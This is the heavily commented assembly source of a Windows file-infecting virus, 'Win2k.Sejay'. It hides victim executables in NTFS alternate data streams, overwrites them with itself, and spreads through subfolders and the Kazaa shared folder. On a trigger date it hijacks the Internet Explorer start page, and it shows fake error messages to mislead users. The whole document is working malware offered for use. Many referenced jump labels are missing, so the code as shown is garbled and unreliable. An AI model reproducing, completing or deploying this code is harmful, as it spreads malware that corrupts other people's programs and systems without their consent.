;       ____________________________
;      |                            |
;      |  Win2k.Sejay               |#
;      |  Stream Companion Virus    |##
;      |                            |##
;      |  coded by DiA/rrlf         |##
;      |  (c)2005 Germany           |##
;      |                            |##
;      |  DiA_hates_machine@gmx.de  |##
;      |  http://www.vx-dia.de.vu   |##
;      |____________________________|##
;        ##############################
;         #############################
;  .disclaimer
;    This is a source code of a working virus! If you rewrite, copy or assemble it
;    you and only YOU are responsible for the things you do! Take care...
;  .intro
;    This is a companion virus, using the "Stream Companion" method. Only working
;    on NTFS formated harddrives, because FAT don't have the streaming feature.
;    Inspired from the first "Stream Companion" virus Win2k.Stream (also the only
;    one source I can find to learn from). Dedicated to my mate Erik, who is the
;    name-father of this virus. I have heavy commented the source, hopy you like
;    it! Only tested under WinXP SP1...
;  .description
;    -check OS, if its not Win2000 or above show a fake error message, because virus
;     can't execute host or infecting files
;    -working with a temp file, stored in windows directory as Sejay.DiA
;    -infect files by creating a new stream with name of last 4 bytes from victim file
;     eG Whatever.exe copy to Whatever.exe:ever
;     then copy virus over the main stream Whatever.exe
;    -the virus checks if the stream already exists, if so the file is already infected
;    -execute host by creating stream name and run it  eG execute Whatever.exe:ever ,
;     if something goes wrong it shows a fake message (also on first generation)
;    -infect current folder, all sub-folders and the Kazaa Shared Folder (aka P2P spreading)
;    -log every infected file in a file stored in windows directory called Sejay.htm ,
;     and if payload date (03.02) the virus sets this file to start page from IE, when
;     somethin goes wrong it shows a simple message box with a lyric from Bad Luck 13
;    -unpacked the virus is 5632bytes huge, after upx'ing its 3072bytes small.
;  .assemble
;    Assemble it with the Flatassembler GUI version 1.56, you can get this nice assembler
;    for free at http://flatassembler.net !
;  .outro
;    For bug report or greets/fucks please mail me at DiA_hates_machine@gmx.de or do a entry
;    in my guestbook at http://www.vx-dia.de.vu . And now have fun with this little creature...
;  .source

include "%fasminc%\win32ax.inc" 			;equates

Sejay:							;virus start
	invoke GetVersion				;get os verion (al=05 -> win2000 and above [eg winxp is 0A280105h])
	cmp al, 05d					;check al for 05
	jne NonNTFS					;if not show some fake error msg

	invoke GetModuleFileName,\			;get virus file name
	       0,\					;no handle
	       VirusFile,\				;save here full path
	       256d					;size of buffer
	cmp eax, 0					;error? no virus path, no infection
	je ExecuteHost					;run host without infection :@

	invoke GetWindowsDirectory,\			;to store the temp file in
	       WinTempDir,\				;save here
	       256d					;size of buffer
	cmp eax, 0					;error
	je ExecuteHost					;narf...

	mov esi, WinTempDir				;to check if the path is valid

	cmp byte [esi], 0				;end of string?
	je CheckIfValid 				;check for "\" at the end

	inc esi 					;address + 1
	jmp GetPathEnd

	cmp byte [esi - 1], "\" 			;check for "\" at the end
	je BindStrings					;then dont append the \

	mov byte [esi], "\"				;place a \ at the end of the string
	mov dword [esi + 1], 0				; ,0

	invoke lstrcat,\				;append TempFile string via api
	       WinTempDir,\				;append to windows path
	       TempFile 				;append sthis

	invoke GetWindowsDirectory,\			;to get payload file
	       PayTempFile,\				;store it here
	       256d					;size of buffer

	mov esi, PayTempFile				;check if it is valid

	cmp byte [esi], 0				;end?
	je CheckValidness				;same as above

	inc esi
	jmp GetPayEnd					;again

	cmp byte [esi - 1], "\" 			;check string end for \
	je MakePayFile					;all is ok

	mov byte [esi], "\"				;place \ at end
	mov dword [esi + 1], 0				;zero

	invoke lstrcat,\				;bind strings
	       PayTempFile,\				;append to win dir
	       PayFile					;the filename

	invoke CreateFile,\				;open temp file
	       PayTempFile,\				;this
	       GENERIC_READ + GENERIC_WRITE,\		;read n write access
	       FILE_SHARE_WRITE,\			;open if can write
	       0,\					;no security attributes
	       OPEN_EXISTING,\				;open the file
	       FILE_ATTRIBUTE_NORMAL,\			;normal
	       0					;no handle
	cmp eax, INVALID_HANDLE_VALUE			;error?
	jne SaveHandle					;if not dont create file again

	call CreatePayloadFile				;if not exist create payload file

	mov dword [PayHandle], eax			;save handle

	call InfectFolder				;infect current folder (all files)

	invoke FindFirstFile,\				;get some folders
	       Folder,\ 				;by search for *.*
	       Win32FindData				;already defined
	mov dword [FolderHandle], eax			;save handle

	cmp eax, 0					;no more folders?!
	je CloseFolderHandle				;then close handle and execute host stream

	invoke GetCurrentDirectory,\			;to get a valid SetCurrentDir.. path
	       256d,\					;size of buffer
	       VictimFolder				;save there

	mov esi, VictimFolder				;get end of string

	cmp byte [esi], 0				;check for zero -> end
	je HaveEndDir					;check for validness

	inc esi 					;next byte
	jmp GetEndDir					;check

	cmp byte [esi - 1], "\" 			;is there a \
	je DirValid					;if so, it is valid

	mov byte [esi], "\"				;if not make it valid
	mov dword [esi + 1], 0				;end of string

	mov esi, Win32FindData.cFileName		;get end of victim string

	cmp byte [esi], 0				;end of string?
	je HaveEndVictim				;if so jmp to ...

	inc esi 					;next byte
	jmp GetEndVictim				;check it baby

	cmp byte [esi - 1], "." 			;found a . or .. ?!
	je FindNextFolder				;if so find next

	cmp byte [esi - 4], "." 			;is it a file?
	je FindNextFolder				;if so find next

	mov byte [esi], "\"				;to get a valid path
	mov dword [esi + 1], 0				;zero at the end

	invoke lstrcat,\				;bind strings
	       VictimFolder,\				;string1
	       Win32FindData.cFileName			;add this

	invoke SetCurrentDirectory,\			;change directory
	       VictimFolder				;to this

	cmp eax, 0					;error?
	je FindNextFolder				;then find next

	call InfectFolder				;infect it baby

	mov esi, VictimFolder				;to change directory back

	cmp byte [esi], 0				;check for end
	je HaveFirstFolder1				;have it

	inc esi 					;continue
	jmp GetFirstFolder1				;...

	sub esi, 2					;get before "\"

	cmp byte [esi], "\"				;check for \
	je HaveFirstFolder2				;change back

	dec esi 					;-1
	jmp GetFirstFolder2				;check

	mov dword [esi + 1], 0				;clear all after

	invoke SetCurrentDirectory,\			;set it new
	       VictimFolder				;to first folder

	invoke FindNextFile,\				;find next
	       dword [FolderHandle],\			;the handle
	       Win32FindData				;the structure
	jmp FindMoreFolder				;go get it

	invoke CloseHandle,\				;close handle
	       dword [FolderHandle]			;this

	invoke RegOpenKeyEx,\				;open key
	       HKEY_CURRENT_USER,\			;with this handle
	       KazaaShare,\				;this subkey
	       0,\					;reserved
	       KEY_QUERY_VALUE,\			;read a value
	       KazaaRegHandle				;save there the handle

	cmp eax, 0					;error?
	jne ExecuteHost 				;no kazaa installed

	invoke RegQueryValueEx,\			;read the value (shared folder path)
	       dword [KazaaRegHandle],\ 		;handle
	       KazzaFolder,\				;DlDir0
	       0,\					;reserved
	       0,\					;its a string
	       KazaaVictim,\				;save there the path
	       KazaaSize				;size of buffer

	cmp eax, 0					;error?
	jne CloseRegKey 				;the close the key, no infection

	mov esi, KazaaVictim				;to check validness

	cmp byte [esi], 0				;end of string?
	je HaveKazaaEnd 				;jmp to there

	inc esi 					;next place
	jmp GetKazaaEnd 				;go for it!

	cmp byte [esi - 1], "\" 			;check for \
	je KazaaSlash					;if exist jmp to ...

	mov byte [esi], "\"				;make it valid
	mov dword [esi + 1], 0				;zero at end

	invoke SetCurrentDirectory,\			;change to kazaa folder
	       KazaaVictim				;infect this please

	call InfectFolder				;DO IT!

	invoke RegCloseKey,\				;close key
	       dword [KazaaRegHandle]			;with handle

	mov esi, VirusFile				;make host file string

	cmp byte [esi], 0				;0 is the end of the string
	je AppendHostStream				;then append stream name

	inc esi 					;address + 1
	jmp GetHostFileStream				;check next byte

	mov edi, dword [esi - 8d]			;load a dword in edi (last 4 chars of host file name)

	mov byte [esi], ":"				;append a : and then the name
	mov dword [esi + 1d], edi			;append last dword of victims name
	mov dword [esi + 5d], 0 			;append the zero

	invoke GetCommandLine				;get commandline (maybe user did some parameters)

	invoke CreateProcess,\				;run host file stream
	       VirusFile,\				;current file + streamname = host stream
	       eax,\					;commandline in eax
	       0,\					;no attributes
	       0,\					;...
	       0,\					;no flag
	       CREATE_NEW_CONSOLE,\			;run new prog
	       0,\					;no new enviroment block
	       0,\					;no current directory
	       StartupInfo,\				;structure
	       ProcessInfo				;structure

	cmp eax, 0					;error starting stream?
	je CantRunHost					;show error msg box

	invoke GetSystemTime,\				;payload action?!
	       Systemtime				;structure

	cmp word [Systemtime.wMonth], 02d		;2. month of the year?
	jne Exit					;if not the exit

	cmp word [Systemtime.wDay], 03d 		;03.02?
	jne Exit					;goodbye

	invoke RegOpenKeyEx,\				;open registry key
	       HKEY_CURRENT_USER,\			;handle
	       PaySubkey,\				;open this
	       0,\					;reserved
	       KEY_SET_VALUE,\				;set a value
	       PayRegHandle				;save here the handle
	cmp eax, 0					;error?
	jne PayloadMessage				;then other payload

	invoke lstrlen,\				;get lenth of pay file string
	       PayTempFile				;here
	inc eax 					;including the zero

	invoke RegSetValueEx,\				;change start page of IE
	       dword [PayRegHandle],\			;handle of open key
	       PayIEStart,\				;value name
	       0,\					;reserved
	       REG_SZ,\ 				;its a string
	       PayTempFile,\				;this data
	       eax					;size
	cmp eax, 0					;error?
	jne PayloadMessage				;hmm, then use a simple msgbox

	invoke RegCloseKey,\				;close it
	       dword [PayRegHandle]			;with handle
	jmp Exit					;bye

	invoke MessageBox,\				;show user a msgbox
	       0,\					;bad luck 13 lyric
	       PayLyric,\				;more lines then one
	       "You are infected with Win2k.Sejay! :: coded by DiA/rrlf (c)05",\
	       MB_ICONINFORMATION			;information style

	invoke CloseHandle,\				;close payload file
	       dword [PayHandle]			;with handle

	invoke ExitProcess,\				;exit virus

	invoke MessageBox,\				;no ntfs formated, cant run virus
	       "This application requires a NTFS formated disk.",\  ;)
	       "ERROR 53656A6179",\			;hex for Sejay
	       MB_ICONERROR				;scary error
	jmp Exit					;dont grumble the win9x user anymore ^^

	invoke MessageBox,\				;cant run host :/
	       "Application execution failed.",\
	       "ERROR 446941",\ 			;hex for DiA
	jmp Exit

	invoke CreateFile,\				;create the payload file in win dir
	       PayTempFile,\				;create this
	       GENERIC_READ + GENERIC_WRITE,\		;read n write
	       FILE_SHARE_WRITE,\			;to write
	       0,\					;no attributes
	       CREATE_NEW,\				;new file
	       FILE_ATTRIBUTE_NORMAL,\			;normal all
	       0					;no handle
	push eax					;save handle

	invoke WriteFile,\				;write file header
	       eax,\					;handle
	       PayHTMLhead,\				;points to buffer
	       133d,\					;numers of bytes to write
	       PayBytesWritten,\			;bytes written
	       0					;no overlapped

	pop eax 					;get handle
ret							;return

	invoke FindFirstFile,\				;find first vicitim (*.exe)
	       Victims,\				;exe
	       Win32FindData				;structure
	mov dword [FindHandle], eax			;save handle

	cmp eax, 0					;no more files?!
	je InfectDone					;restore host file name (steam) and run it

	invoke lstrcpy,\				;copy victim path to appen stream name
	       VictimStream,\				;copy to this
	       Win32FindData.cFileName			;from this (eax points to buffer string ..VistimStream..)

	cmp byte [eax], 0				;get end of string
	je CheckVirusFile				;check if founded file is the virus file itself & append the stream name

	inc eax 					;address + 1
	jmp GetVictimFileStream 			;next byte

	mov ebx, VirusFile				;to jmp to the end of the string

	cmp byte [ebx], 0				;zero = end
	je CompareFiles 				;copare the strings (1dowrd (xxxx))

	inc ebx 					;if not address + 1
	jmp GetVirusFileEnd

	mov esi, dword [ebx - 8d]			;load a dword befor extension
	mov edi, dword [eax - 8d]			;...

	cmp esi, edi					;compare
	je FindNextVictim				;dont belong the virus

	mov byte [eax], ":"				;append a : and then the name
	mov dword [eax + 1d], edi			;append last dword of victims name
	mov dword [eax + 5d], 0 			;append the zero

	invoke CopyFile,\				;copy victim to temp file
	       Win32FindData.cFileName,\		;this to
	       WinTempDir,\				;temp file
	       0					;copy always
	cmp eax, 0					;error?
	je FindNextVictim				;dont infect if we cant make a temp file

	invoke CopyFile,\				;check if we can copy the temp file to stream name
	       WinTempDir,\				;if not the file is already infected
	       VictimStream,\				;to this name Victim.exe:ctim
	       1					;not copy always
	cmp eax, 0					;error?
	je FindNextVictim				;then find next file

	invoke CopyFile,\				;copy virus file to vivtim
	       VirusFile,\				;this
	       Win32FindData.cFileName,\		;to this
	       0					;always
	cmp eax, 0					;error?!
	je FindNextVictim				;no infection, narf

	invoke CopyFile,\				;copy victim to stream
	       WinTempDir,\				;temp file
	       VictimStream,\				;this
	       0					;always
	cmp eax, 0					;erroreee
	je FindNextVictim				;more more more

	invoke SetFilePointer,\ 			;end of payload file
	       dword [PayHandle],\			;handle of file
	       0,\					;no distance, only end
	       0,\					;brrr
	       FILE_END 				;there we go

	invoke WriteFile,\				;infected html header <html><body>
	       dword [PayHandle],\			;file handle
	       PayInfHeader,\				;filename + scary message
	       12d,\					;number of bytes to write
	       PayBytesWritten,\			;number of bytes written
	       0					;no structure

	invoke lstrcat,\				;append scarey infected! message
	       Win32FindData.cFileName,\		;append to this
	       PayInfected				;payload message

	invoke lstrlen,\				;get legth of string to write it in payload file
	       eax					;pointer to buffer ^^^^

	invoke WriteFile,\				;write infected file to payload file
	       dword [PayHandle],\			;file handle
	       Win32FindData.cFileName,\		;filename + scary message
	       eax,\					;number of bytes to write
	       PayBytesWritten,\			;number of bytes written
	       0					;no structure

	invoke DeleteFile,\				;delete
	       WinTempDir				;the temp file

	invoke FindNextFile,\				;find more files to infect
	       dword [FindHandle],\			;handle from FindFirstFile
	       Win32FindData				;structure
	jmp FindMoreFiles				;go get it!

	invoke CloseHandle,\				;close find handle
	       dword [FindHandle]
ret							;back to call

	VirusFile	rb 256d 			;save here full path of virus file
	WinTempDir	rb 256d 			;to store temp files
	Victims 	db "*.exe",0			;search for exe
	FindHandle	dd ?				;save here handle to find exe files
	VictimStream	rb 256d 			;victim stream name
	TempFile	db "Sejay.DiA",0		;temp file

	FolderHandle	dd ?				;handle for finding sub folders
	VictimFolder	rb 256d 			;save here folder to infect
	Folder		db "*.*",0			;find all (including folders)

	KazaaShare	db "Software\Kazaa\Transfer",0	;for kazza share folder infection
	KazaaRegHandle	dd ?				;handle for reg key
	KazzaFolder	db "DlDir0",0			;value name
	KazaaVictim	rb 255d 			;save path here
	KazaaSize	db 255d 			;size of buffer

	StartupInfo	STARTUPINFO			;structure already defined by fasm
	Win32FindData	FINDDATA			;...
	Systemtime	SYSTEMTIME			;...

	PayTempFile	rb 256d
	PayFile 	db "Sejay.htm",0
	PayHTMLhead	db "<html><head><title>Win2k.Sejay</title></head><body text='#FF0000' bgcolor='#000000'><h1>YOUR COMPUTER IS INFECTED!</h1></body></html>",0
	PayInfHeader	db "<html><body>",0
	PayInfected	db " - <b>infected with Win2k.Sejay by DiA/rrlf</b><br></body></html>",0
	PaySubkey	db "Software\Microsoft\Internet Explorer\Main",0
	PayIEStart	db "Start Page",0
	PayLyric	db "Kings of the underground, hardest of the hardcore.",10,13
			db "Bottles flyin' all around, bats are on the dance floor",10,13,10,13
			db "Flames of hell surround me, blood is dripping down my face",10,13
			db "The realife psychopaths, Bad luck will destroy this place.",10,13,10,13
			db "...Like pussies you run.",10,13,"3 minutes, that's all, our set is done.",0
	PayHandle	dd ?
	PayBytesWritten dd ?
	PayRegHandle	dd ?

data import						;import api's
	library kernel32, "KERNEL32.DLL",\
		user32, "USER32.DLL",\
		advapi32, "ADVAPI32.DLL"

	import kernel32,\
	       GetVersion, "GetVersion",\
	       GetModuleFileName, "GetModuleFileNameA",\
	       CreateProcess, "CreateProcessA",\
	       FindFirstFile, "FindFirstFileA",\
	       FindNextFile, "FindNextFileA",\
	       CopyFile, "CopyFileA",\
	       lstrcpy, "lstrcpyA",\
	       DeleteFile, "DeleteFileA",\
	       GetCommandLine, "GetCommandLineA",\
	       GetWindowsDirectory, "GetWindowsDirectoryA",\
	       lstrcat, "lstrcatA",\
	       lstrlen, "lstrlenA",\
	       CreateFile, "CreateFileA",\
	       WriteFile, "WriteFile",\
	       SetFilePointer, "SetFilePointer",\
	       CloseHandle, "CloseHandle",\
	       GetSystemTime, "GetSystemTime",\
	       GetCurrentDirectory, "GetCurrentDirectoryA",\
	       SetCurrentDirectory, "SetCurrentDirectoryA",\
	       ExitProcess, "ExitProcess"

	import user32,\
	       MessageBox, "MessageBoxA"

	import advapi32,\
	       RegOpenKeyEx, "RegOpenKeyExA",\
	       RegSetValueEx, "RegSetValueExA",\
	       RegQueryValueEx, "RegQueryValueExA",\
	       RegCloseKey, "RegCloseKey"
end data